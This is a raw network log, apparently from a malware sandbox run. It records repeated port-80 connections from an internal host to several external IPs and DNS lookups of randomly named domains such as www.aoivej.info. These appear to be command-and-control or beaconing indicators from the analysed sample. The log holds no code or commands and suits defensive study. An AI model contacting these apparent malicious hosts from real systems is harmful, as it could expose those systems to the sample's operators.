Jan 11, 2025 02:45:53.495090008 CET	49991	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:53.843712091 CET	49991	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:54.864029884 CET	49992	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:54.868963003 CET	80	49992	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:54.869035959 CET	49992	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:54.883136988 CET	49992	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:54.887984991 CET	80	49992	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:54.888088942 CET	80	49992	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:56.020955086 CET	80	49992	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:56.020979881 CET	80	49992	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:56.021039963 CET	49992	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:56.021337986 CET	80	49992	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:56.021374941 CET	49992	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:56.387140036 CET	49992	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:57.404239893 CET	49993	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:57.409096956 CET	80	49993	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:57.409259081 CET	49993	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:57.420515060 CET	49993	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:57.425379992 CET	80	49993	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:58.549335957 CET	80	49993	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:58.549405098 CET	80	49993	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:58.549670935 CET	49993	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:58.549868107 CET	80	49993	188.114.97.3	192.168.2.7
Jan 11, 2025 02:45:58.550137997 CET	49993	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:58.553538084 CET	49993	80	192.168.2.7	188.114.97.3
Jan 11, 2025 02:45:58.558342934 CET	80	49993	188.114.97.3	192.168.2.7
Jan 11, 2025 02:46:11.730210066 CET	49994	80	192.168.2.7	18.163.74.139
Jan 11, 2025 02:46:11.735110044 CET	80	49994	18.163.74.139	192.168.2.7
Jan 11, 2025 02:46:11.735198021 CET	49994	80	192.168.2.7	18.163.74.139
Jan 11, 2025 02:46:11.750161886 CET	49994	80	192.168.2.7	18.163.74.139
Jan 11, 2025 02:46:11.755166054 CET	80	49994	18.163.74.139	192.168.2.7
Jan 11, 2025 02:46:12.654278994 CET	80	49994	18.163.74.139	192.168.2.7
Jan 11, 2025 02:46:12.654366970 CET	80	49994	18.163.74.139	192.168.2.7
Jan 11, 2025 02:46:12.654429913 CET	49994	80	192.168.2.7	18.163.74.139
Jan 11, 2025 02:46:13.260570049 CET	49994	80	192.168.2.7	18.163.74.139
Jan 11, 2025 02:46:14.279999971 CET	49995	80	192.168.2.7	18.163.74.139
Jan 11, 2025 02:46:14.285134077 CET	80	49995	18.163.74.139	192.168.2.7
Jan 11, 2025 02:46:14.285232067 CET	49995	80	192.168.2.7	18.163.74.139
Jan 11, 2025 02:46:14.305784941 CET	49995	80	192.168.2.7	18.163.74.139
Jan 11, 2025 02:46:14.310749054 CET	80	49995	18.163.74.139	192.168.2.7
Jan 11, 2025 02:46:15.237441063 CET	80	49995	18.163.74.139	192.168.2.7
Jan 11, 2025 02:46:15.237601995 CET	80	49995	18.163.74.139	192.168.2.7
Jan 11, 2025 02:46:15.240453959 CET	49995	80	192.168.2.7	18.163.74.139
Jan 11, 2025 02:46:15.807354927 CET	49995	80	192.168.2.7	18.163.74.139
Jan 11, 2025 02:46:16.826354027 CET	49996	80	192.168.2.7	18.163.74.139
Jan 11, 2025 02:46:16.831398010 CET	80	49996	18.163.74.139	192.168.2.7
Jan 11, 2025 02:46:16.831753969 CET	49996	80	192.168.2.7	18.163.74.139
Jan 11, 2025 02:46:16.846302032 CET	49996	80	192.168.2.7	18.163.74.139
Jan 11, 2025 02:46:16.851159096 CET	80	49996	18.163.74.139	192.168.2.7
Jan 11, 2025 02:46:16.851238012 CET	80	49996	18.163.74.139	192.168.2.7
Jan 11, 2025 02:46:17.772213936 CET	80	49996	18.163.74.139	192.168.2.7
Jan 11, 2025 02:46:17.772309065 CET	80	49996	18.163.74.139	192.168.2.7
Jan 11, 2025 02:46:17.776170015 CET	49996	80	192.168.2.7	18.163.74.139
Jan 11, 2025 02:46:18.354619026 CET	49996	80	192.168.2.7	18.163.74.139
Jan 11, 2025 02:46:19.373900890 CET	49997	80	192.168.2.7	18.163.74.139
Jan 11, 2025 02:46:19.378870964 CET	80	49997	18.163.74.139	192.168.2.7
Jan 11, 2025 02:46:19.378998995 CET	49997	80	192.168.2.7	18.163.74.139
Jan 11, 2025 02:46:19.388154030 CET	49997	80	192.168.2.7	18.163.74.139
Jan 11, 2025 02:46:19.393013000 CET	80	49997	18.163.74.139	192.168.2.7
Jan 11, 2025 02:46:20.314753056 CET	80	49997	18.163.74.139	192.168.2.7
Jan 11, 2025 02:46:20.314955950 CET	80	49997	18.163.74.139	192.168.2.7
Jan 11, 2025 02:46:20.315001965 CET	49997	80	192.168.2.7	18.163.74.139
Jan 11, 2025 02:46:20.318978071 CET	49997	80	192.168.2.7	18.163.74.139
Jan 11, 2025 02:46:20.323817968 CET	80	49997	18.163.74.139	192.168.2.7
Jan 11, 2025 02:46:25.814531088 CET	49998	80	192.168.2.7	162.218.30.235
Jan 11, 2025 02:46:25.819464922 CET	80	49998	162.218.30.235	192.168.2.7
Jan 11, 2025 02:46:25.820225000 CET	49998	80	192.168.2.7	162.218.30.235
Jan 11, 2025 02:46:25.834757090 CET	49998	80	192.168.2.7	162.218.30.235
Jan 11, 2025 02:46:25.839696884 CET	80	49998	162.218.30.235	192.168.2.7
Jan 11, 2025 02:46:26.466876984 CET	80	49998	162.218.30.235	192.168.2.7
Jan 11, 2025 02:46:26.466921091 CET	80	49998	162.218.30.235	192.168.2.7
Jan 11, 2025 02:46:26.466968060 CET	49998	80	192.168.2.7	162.218.30.235
Jan 11, 2025 02:46:27.338821888 CET	49998	80	192.168.2.7	162.218.30.235
Jan 11, 2025 02:46:28.358133078 CET	49999	80	192.168.2.7	162.218.30.235
Jan 11, 2025 02:46:28.363008976 CET	80	49999	162.218.30.235	192.168.2.7
Jan 11, 2025 02:46:28.363090038 CET	49999	80	192.168.2.7	162.218.30.235
Jan 11, 2025 02:46:28.381057024 CET	49999	80	192.168.2.7	162.218.30.235
Jan 11, 2025 02:46:28.385927916 CET	80	49999	162.218.30.235	192.168.2.7
Jan 11, 2025 02:46:28.950300932 CET	80	49999	162.218.30.235	192.168.2.7
Jan 11, 2025 02:46:28.950396061 CET	80	49999	162.218.30.235	192.168.2.7
Jan 11, 2025 02:46:28.950443029 CET	49999	80	192.168.2.7	162.218.30.235
Jan 11, 2025 02:46:29.889870882 CET	49999	80	192.168.2.7	162.218.30.235
Jan 11, 2025 02:46:30.904567957 CET	50000	80	192.168.2.7	162.218.30.235
Jan 11, 2025 02:46:30.909518003 CET	80	50000	162.218.30.235	192.168.2.7
Jan 11, 2025 02:46:30.909593105 CET	50000	80	192.168.2.7	162.218.30.235
Jan 11, 2025 02:46:30.927308083 CET	50000	80	192.168.2.7	162.218.30.235
Jan 11, 2025 02:46:30.932090044 CET	80	50000	162.218.30.235	192.168.2.7
Jan 11, 2025 02:46:30.932241917 CET	80	50000	162.218.30.235	192.168.2.7
Jan 11, 2025 02:46:31.509609938 CET	80	50000	162.218.30.235	192.168.2.7
Jan 11, 2025 02:46:31.509670973 CET	80	50000	162.218.30.235	192.168.2.7
Jan 11, 2025 02:46:31.509767056 CET	50000	80	192.168.2.7	162.218.30.235
Jan 11, 2025 02:46:32.433850050 CET	50000	80	192.168.2.7	162.218.30.235
Jan 11, 2025 02:46:33.453651905 CET	50001	80	192.168.2.7	162.218.30.235
Jan 11, 2025 02:46:33.458822966 CET	80	50001	162.218.30.235	192.168.2.7
Jan 11, 2025 02:46:33.462394953 CET	50001	80	192.168.2.7	162.218.30.235
Jan 11, 2025 02:46:33.473252058 CET	50001	80	192.168.2.7	162.218.30.235
Jan 11, 2025 02:46:33.478131056 CET	80	50001	162.218.30.235	192.168.2.7
Jan 11, 2025 02:46:34.047383070 CET	80	50001	162.218.30.235	192.168.2.7
Jan 11, 2025 02:46:34.047424078 CET	80	50001	162.218.30.235	192.168.2.7
Jan 11, 2025 02:46:34.047558069 CET	50001	80	192.168.2.7	162.218.30.235
Jan 11, 2025 02:46:34.050405979 CET	50001	80	192.168.2.7	162.218.30.235
Jan 11, 2025 02:46:34.055217028 CET	80	50001	162.218.30.235	192.168.2.7
Jan 11, 2025 02:46:39.416354895 CET	50002	80	192.168.2.7	192.186.58.31
Jan 11, 2025 02:46:39.421241045 CET	80	50002	192.186.58.31	192.168.2.7
Jan 11, 2025 02:46:39.421380043 CET	50002	80	192.168.2.7	192.186.58.31
Jan 11, 2025 02:46:39.436949015 CET	50002	80	192.168.2.7	192.186.58.31
Jan 11, 2025 02:46:39.441853046 CET	80	50002	192.186.58.31	192.168.2.7
Jan 11, 2025 02:46:40.358995914 CET	80	50002	192.186.58.31	192.168.2.7
Jan 11, 2025 02:46:40.359076977 CET	80	50002	192.186.58.31	192.168.2.7
Jan 11, 2025 02:46:40.359327078 CET	50002	80	192.168.2.7	192.186.58.31
Jan 11, 2025 02:46:40.948035002 CET	50002	80	192.168.2.7	192.186.58.31
Jan 11, 2025 02:46:41.966842890 CET	50003	80	192.168.2.7	192.186.58.31
Jan 11, 2025 02:46:41.971822977 CET	80	50003	192.186.58.31	192.168.2.7
Jan 11, 2025 02:46:41.974149942 CET	50003	80	192.168.2.7	192.186.58.31
Jan 11, 2025 02:46:41.993860960 CET	50003	80	192.168.2.7	192.186.58.31
Jan 11, 2025 02:46:41.999219894 CET	80	50003	192.186.58.31	192.168.2.7
Jan 11, 2025 02:46:43.496213913 CET	50003	80	192.168.2.7	192.186.58.31
Jan 11, 2025 02:46:43.501223087 CET	80	50003	192.186.58.31	192.168.2.7
Jan 11, 2025 02:46:43.501365900 CET	50003	80	192.168.2.7	192.186.58.31
Jan 11, 2025 02:46:44.513880014 CET	50004	80	192.168.2.7	192.186.58.31
Jan 11, 2025 02:46:44.518978119 CET	80	50004	192.186.58.31	192.168.2.7
Jan 11, 2025 02:46:44.519068003 CET	50004	80	192.168.2.7	192.186.58.31
Jan 11, 2025 02:46:44.537957907 CET	50004	80	192.168.2.7	192.186.58.31
Jan 11, 2025 02:46:44.543109894 CET	80	50004	192.186.58.31	192.168.2.7
Jan 11, 2025 02:46:44.543150902 CET	80	50004	192.186.58.31	192.168.2.7
Jan 11, 2025 02:46:45.420588970 CET	80	50004	192.186.58.31	192.168.2.7
Jan 11, 2025 02:46:45.420680046 CET	80	50004	192.186.58.31	192.168.2.7
Jan 11, 2025 02:46:45.420818090 CET	50004	80	192.168.2.7	192.186.58.31
Jan 11, 2025 02:46:46.041856050 CET	50004	80	192.168.2.7	192.186.58.31
Jan 11, 2025 02:46:47.061866999 CET	50005	80	192.168.2.7	192.186.58.31
Jan 11, 2025 02:46:47.066983938 CET	80	50005	192.186.58.31	192.168.2.7
Jan 11, 2025 02:46:47.067223072 CET	50005	80	192.168.2.7	192.186.58.31
Jan 11, 2025 02:46:47.077867985 CET	50005	80	192.168.2.7	192.186.58.31
Jan 11, 2025 02:46:47.082741022 CET	80	50005	192.186.58.31	192.168.2.7
Jan 11, 2025 02:46:48.010176897 CET	80	50005	192.186.58.31	192.168.2.7
Jan 11, 2025 02:46:48.010257959 CET	80	50005	192.186.58.31	192.168.2.7
Jan 11, 2025 02:46:48.012886047 CET	50005	80	192.168.2.7	192.186.58.31
Jan 11, 2025 02:46:48.015886068 CET	50005	80	192.168.2.7	192.186.58.31
Jan 11, 2025 02:46:48.020764112 CET	80	50005	192.186.58.31	192.168.2.7
Jan 11, 2025 02:46:53.061825991 CET	50006	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:46:53.066602945 CET	80	50006	47.83.1.90	192.168.2.7
Jan 11, 2025 02:46:53.070065975 CET	50006	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:46:53.083972931 CET	50006	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:46:53.088748932 CET	80	50006	47.83.1.90	192.168.2.7
Jan 11, 2025 02:46:54.590259075 CET	50006	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:46:54.595307112 CET	80	50006	47.83.1.90	192.168.2.7
Jan 11, 2025 02:46:54.595419884 CET	50006	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:46:55.666259050 CET	50007	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:46:55.671204090 CET	80	50007	47.83.1.90	192.168.2.7
Jan 11, 2025 02:46:55.676577091 CET	50007	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:46:55.794506073 CET	50007	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:46:55.799403906 CET	80	50007	47.83.1.90	192.168.2.7
Jan 11, 2025 02:46:57.302644968 CET	80	50007	47.83.1.90	192.168.2.7
Jan 11, 2025 02:46:57.302731991 CET	80	50007	47.83.1.90	192.168.2.7
Jan 11, 2025 02:46:57.303082943 CET	50007	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:46:57.308216095 CET	50007	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:46:58.328800917 CET	50008	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:46:58.333941936 CET	80	50008	47.83.1.90	192.168.2.7
Jan 11, 2025 02:46:58.334038973 CET	50008	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:46:58.358795881 CET	50008	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:46:58.363785982 CET	80	50008	47.83.1.90	192.168.2.7
Jan 11, 2025 02:46:58.363897085 CET	80	50008	47.83.1.90	192.168.2.7
Jan 11, 2025 02:46:59.870064974 CET	50008	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:46:59.875377893 CET	80	50008	47.83.1.90	192.168.2.7
Jan 11, 2025 02:46:59.875690937 CET	50008	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:47:00.889198065 CET	50009	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:47:00.893991947 CET	80	50009	47.83.1.90	192.168.2.7
Jan 11, 2025 02:47:00.894085884 CET	50009	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:47:00.903713942 CET	50009	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:47:00.908503056 CET	80	50009	47.83.1.90	192.168.2.7
Jan 11, 2025 02:47:02.474479914 CET	80	50009	47.83.1.90	192.168.2.7
Jan 11, 2025 02:47:02.474642992 CET	80	50009	47.83.1.90	192.168.2.7
Jan 11, 2025 02:47:02.474714994 CET	50009	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:47:02.477416039 CET	50009	80	192.168.2.7	47.83.1.90
Jan 11, 2025 02:47:02.482300043 CET	80	50009	47.83.1.90	192.168.2.7
Jan 11, 2025 02:47:07.511279106 CET	50010	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:07.516182899 CET	80	50010	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:07.516263962 CET	50010	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:07.534090996 CET	50010	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:07.539218903 CET	80	50010	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:08.097610950 CET	80	50010	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:08.097635984 CET	80	50010	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:08.097654104 CET	80	50010	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:08.097667933 CET	80	50010	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:08.097680092 CET	80	50010	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:08.097692966 CET	50010	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:08.097743988 CET	80	50010	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:08.097748041 CET	50010	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:08.097755909 CET	80	50010	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:08.097769976 CET	80	50010	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:08.097790956 CET	50010	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:08.097821951 CET	50010	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:08.098290920 CET	80	50010	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:08.101986885 CET	50010	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:09.042295933 CET	50010	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:10.060816050 CET	50011	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:10.065609932 CET	80	50011	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:10.065694094 CET	50011	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:10.082724094 CET	50011	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:10.087521076 CET	80	50011	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:10.626666069 CET	80	50011	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:10.626682997 CET	80	50011	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:10.626693964 CET	80	50011	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:10.626768112 CET	80	50011	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:10.626780033 CET	80	50011	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:10.626791954 CET	80	50011	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:10.626796961 CET	80	50011	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:10.626856089 CET	50011	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:10.626904011 CET	50011	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:10.627203941 CET	80	50011	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:10.627307892 CET	50011	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:11.588932991 CET	50011	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:12.616429090 CET	50012	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:12.621213913 CET	80	50012	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:12.624222040 CET	50012	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:12.760415077 CET	50012	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:12.765356064 CET	80	50012	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:12.765444994 CET	80	50012	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:13.188975096 CET	80	50012	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:13.188985109 CET	80	50012	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:13.188996077 CET	80	50012	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:13.189054012 CET	50012	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:13.189063072 CET	80	50012	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:13.189073086 CET	80	50012	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:13.189084053 CET	80	50012	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:13.189100981 CET	50012	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:13.189130068 CET	50012	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:13.189147949 CET	80	50012	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:13.189157963 CET	80	50012	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:13.189183950 CET	50012	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:13.189851046 CET	80	50012	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:13.189891100 CET	50012	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:14.307534933 CET	50012	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:15.329960108 CET	50013	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:15.334939957 CET	80	50013	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:15.335030079 CET	50013	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:15.356676102 CET	50013	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:15.361596107 CET	80	50013	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:15.909913063 CET	80	50013	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:15.910053015 CET	80	50013	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:15.910142899 CET	50013	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:15.981312037 CET	50013	80	192.168.2.7	104.21.96.1
Jan 11, 2025 02:47:15.986854076 CET	80	50013	104.21.96.1	192.168.2.7
Jan 11, 2025 02:47:21.298141956 CET	50014	80	192.168.2.7	75.2.103.23
Jan 11, 2025 02:47:21.303126097 CET	80	50014	75.2.103.23	192.168.2.7
Jan 11, 2025 02:47:21.303203106 CET	50014	80	192.168.2.7	75.2.103.23
Jan 11, 2025 02:47:21.321692944 CET	50014	80	192.168.2.7	75.2.103.23
Jan 11, 2025 02:47:21.327181101 CET	80	50014	75.2.103.23	192.168.2.7
Jan 11, 2025 02:47:21.774604082 CET	80	50014	75.2.103.23	192.168.2.7
Jan 11, 2025 02:47:21.774720907 CET	80	50014	75.2.103.23	192.168.2.7
Jan 11, 2025 02:47:21.774804115 CET	50014	80	192.168.2.7	75.2.103.23
Jan 11, 2025 02:47:22.825011015 CET	50014	80	192.168.2.7	75.2.103.23
Jan 11, 2025 02:47:23.843363047 CET	50015	80	192.168.2.7	75.2.103.23
Jan 11, 2025 02:47:23.848232031 CET	80	50015	75.2.103.23	192.168.2.7
Jan 11, 2025 02:47:23.848329067 CET	50015	80	192.168.2.7	75.2.103.23
Jan 11, 2025 02:47:23.873683929 CET	50015	80	192.168.2.7	75.2.103.23
Jan 11, 2025 02:47:23.878532887 CET	80	50015	75.2.103.23	192.168.2.7
Jan 11, 2025 02:47:24.331353903 CET	80	50015	75.2.103.23	192.168.2.7
Jan 11, 2025 02:47:24.331439972 CET	80	50015	75.2.103.23	192.168.2.7
Jan 11, 2025 02:47:24.331532955 CET	50015	80	192.168.2.7	75.2.103.23
Jan 11, 2025 02:47:25.385674953 CET	50015	80	192.168.2.7	75.2.103.23
Jan 11, 2025 02:47:26.404839039 CET	50016	80	192.168.2.7	75.2.103.23
Jan 11, 2025 02:47:26.409796000 CET	80	50016	75.2.103.23	192.168.2.7
Jan 11, 2025 02:47:26.409940958 CET	50016	80	192.168.2.7	75.2.103.23
Jan 11, 2025 02:47:26.425172091 CET	50016	80	192.168.2.7	75.2.103.23
Jan 11, 2025 02:47:26.430037975 CET	80	50016	75.2.103.23	192.168.2.7
Jan 11, 2025 02:47:26.430131912 CET	80	50016	75.2.103.23	192.168.2.7
Jan 11, 2025 02:47:26.907094002 CET	80	50016	75.2.103.23	192.168.2.7
Jan 11, 2025 02:47:26.907113075 CET	80	50016	75.2.103.23	192.168.2.7
Jan 11, 2025 02:47:26.907211065 CET	50016	80	192.168.2.7	75.2.103.23
Jan 11, 2025 02:47:27.932698965 CET	50016	80	192.168.2.7	75.2.103.23
Jan 11, 2025 02:47:28.953908920 CET	50017	80	192.168.2.7	75.2.103.23
Jan 11, 2025 02:47:28.958967924 CET	80	50017	75.2.103.23	192.168.2.7
Jan 11, 2025 02:47:28.959074020 CET	50017	80	192.168.2.7	75.2.103.23
Jan 11, 2025 02:47:28.969903946 CET	50017	80	192.168.2.7	75.2.103.23
Jan 11, 2025 02:47:28.974788904 CET	80	50017	75.2.103.23	192.168.2.7
Jan 11, 2025 02:47:29.435446024 CET	80	50017	75.2.103.23	192.168.2.7
Jan 11, 2025 02:47:29.435604095 CET	80	50017	75.2.103.23	192.168.2.7
Jan 11, 2025 02:47:29.435642004 CET	50017	80	192.168.2.7	75.2.103.23
Jan 11, 2025 02:47:29.438973904 CET	50017	80	192.168.2.7	75.2.103.23
Jan 11, 2025 02:47:29.443808079 CET	80	50017	75.2.103.23	192.168.2.7
Jan 11, 2025 02:47:34.713895082 CET	50018	80	192.168.2.7	134.122.133.80
Jan 11, 2025 02:47:34.718722105 CET	80	50018	134.122.133.80	192.168.2.7
Jan 11, 2025 02:47:34.718828917 CET	50018	80	192.168.2.7	134.122.133.80
Jan 11, 2025 02:47:34.733395100 CET	50018	80	192.168.2.7	134.122.133.80
Jan 11, 2025 02:47:34.738253117 CET	80	50018	134.122.133.80	192.168.2.7
Jan 11, 2025 02:47:35.586419106 CET	80	50018	134.122.133.80	192.168.2.7
Jan 11, 2025 02:47:35.586568117 CET	80	50018	134.122.133.80	192.168.2.7
Jan 11, 2025 02:47:35.586648941 CET	50018	80	192.168.2.7	134.122.133.80
Jan 11, 2025 02:47:37.604455948 CET	50018	80	192.168.2.7	134.122.133.80
Jan 11, 2025 02:47:38.623291969 CET	50019	80	192.168.2.7	134.122.133.80
Jan 11, 2025 02:47:38.628329992 CET	80	50019	134.122.133.80	192.168.2.7
Jan 11, 2025 02:47:38.630023956 CET	50019	80	192.168.2.7	134.122.133.80
Jan 11, 2025 02:47:38.644761086 CET	50019	80	192.168.2.7	134.122.133.80
Jan 11, 2025 02:47:38.649518967 CET	80	50019	134.122.133.80	192.168.2.7
Jan 11, 2025 02:47:39.502336979 CET	80	50019	134.122.133.80	192.168.2.7
Jan 11, 2025 02:47:39.502413988 CET	80	50019	134.122.133.80	192.168.2.7
Jan 11, 2025 02:47:39.502630949 CET	50019	80	192.168.2.7	134.122.133.80

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 02:44:21.893775940 CET	59278	53	192.168.2.7	1.1.1.1
Jan 11, 2025 02:44:21.910444021 CET	53	59278	1.1.1.1	192.168.2.7
Jan 11, 2025 02:44:38.592005014 CET	51987	53	192.168.2.7	1.1.1.1
Jan 11, 2025 02:44:38.614438057 CET	53	51987	1.1.1.1	192.168.2.7
Jan 11, 2025 02:44:52.874222040 CET	63676	53	192.168.2.7	1.1.1.1
Jan 11, 2025 02:44:52.907382011 CET	53	63676	1.1.1.1	192.168.2.7
Jan 11, 2025 02:45:06.388959885 CET	61719	53	192.168.2.7	1.1.1.1
Jan 11, 2025 02:45:06.498102903 CET	53	61719	1.1.1.1	192.168.2.7
Jan 11, 2025 02:45:19.829807997 CET	59965	53	192.168.2.7	1.1.1.1
Jan 11, 2025 02:45:19.841149092 CET	53	59965	1.1.1.1	192.168.2.7
Jan 11, 2025 02:45:33.123291969 CET	51978	53	192.168.2.7	1.1.1.1
Jan 11, 2025 02:45:33.166722059 CET	53	51978	1.1.1.1	192.168.2.7
Jan 11, 2025 02:45:49.748538971 CET	61148	53	192.168.2.7	1.1.1.1
Jan 11, 2025 02:45:49.762114048 CET	53	61148	1.1.1.1	192.168.2.7
Jan 11, 2025 02:46:03.561834097 CET	54690	53	192.168.2.7	1.1.1.1
Jan 11, 2025 02:46:03.623388052 CET	53	54690	1.1.1.1	192.168.2.7
Jan 11, 2025 02:46:11.701951027 CET	50333	53	192.168.2.7	1.1.1.1
Jan 11, 2025 02:46:11.727375984 CET	53	50333	1.1.1.1	192.168.2.7
Jan 11, 2025 02:46:25.327491999 CET	52899	53	192.168.2.7	1.1.1.1
Jan 11, 2025 02:46:25.808229923 CET	53	52899	1.1.1.1	192.168.2.7
Jan 11, 2025 02:46:39.062552929 CET	57033	53	192.168.2.7	1.1.1.1
Jan 11, 2025 02:46:39.413677931 CET	53	57033	1.1.1.1	192.168.2.7
Jan 11, 2025 02:46:53.031339884 CET	62572	53	192.168.2.7	1.1.1.1
Jan 11, 2025 02:46:53.054910898 CET	53	62572	1.1.1.1	192.168.2.7
Jan 11, 2025 02:47:07.483906031 CET	56017	53	192.168.2.7	1.1.1.1
Jan 11, 2025 02:47:07.507956028 CET	53	56017	1.1.1.1	192.168.2.7
Jan 11, 2025 02:47:20.998795986 CET	51067	53	192.168.2.7	1.1.1.1
Jan 11, 2025 02:47:21.294461012 CET	53	51067	1.1.1.1	192.168.2.7
Jan 11, 2025 02:47:34.453898907 CET	63659	53	192.168.2.7	1.1.1.1
Jan 11, 2025 02:47:34.708961964 CET	53	63659	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 02:44:21.893775940 CET	192.168.2.7	1.1.1.1	0x6ee8	Standard query (0)	www.aoivej.info	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:44:38.592005014 CET	192.168.2.7	1.1.1.1	0x2886	Standard query (0)	www.givvjn.info	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:44:52.874222040 CET	192.168.2.7	1.1.1.1	0xb176	Standard query (0)	www.gern.dev	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:45:06.388959885 CET	192.168.2.7	1.1.1.1	0xd77c	Standard query (0)	www.newbh.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 02:45:19.829807997 CET	192.168.2.7	1.1.1.1	0x8fcb	Standard query (0)	www.thinkone.xyz	A (IP address)	IN (0x0001)	false
